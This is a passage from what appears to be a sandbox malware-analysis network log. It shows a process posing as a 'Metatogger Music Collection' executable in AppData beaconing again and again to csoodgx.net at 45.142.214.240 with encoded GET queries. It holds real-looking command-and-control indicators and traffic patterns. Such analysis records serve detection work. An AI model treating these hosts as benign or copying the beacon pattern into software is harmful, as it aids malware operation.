    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:22.871659040 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Mar 29, 2024 12:10:22.983299971 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:23.284241915 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:23 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 49760 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:23.628742933 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:23.929877043 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:23 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 49761 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:24.267148018 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:24.576252937 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:24 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Mar 29, 2024 12:10:24.688211918 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:24.984981060 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:24 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Mar 29, 2024 12:10:25.092185020 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:25.394243956 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:25 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.5 | 49762 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:25.734046936 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:26.032165051 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:10:26.142226934 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:26.447014093 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.5 | 49763 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:26.780978918 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:27.079746008 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.5 | 49764 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:27.424287081 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:27.727524042 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.5 | 49765 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:28.062365055 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:28.365735054 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.5 | 49766 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:28.703816891 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:29.002948999 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.5 | 49767 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:29.343836069 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:29.647773981 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.5 | 49768 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:29.982779026 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:30.285660028 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.5 | 49769 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:30.625360012 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:30.924068928 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.5 | 49770 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:31.266789913 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:31.580327988 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.5 | 49771 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:31.920222044 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:32.222223997 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.5 | 49772 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:32.566268921 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:32.863929033 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.5 | 49773 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:33.201024055 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:33.519715071 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.5 | 49774 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:33.860666037 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:34.174215078 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.5 | 49775 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:34.518099070 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:34.819152117 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.5 | 49776 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:35.156161070 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:35.474606991 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.5 | 49777 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:35.810868979 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:36.107671022 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:10:36.217358112 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:36.519197941 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.5 | 49778 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:36.862356901 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:37.167140961 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.5 | 49779 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:37.498092890 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:37.795223951 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.5 | 49780 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:38.127295971 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:38.436038971 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
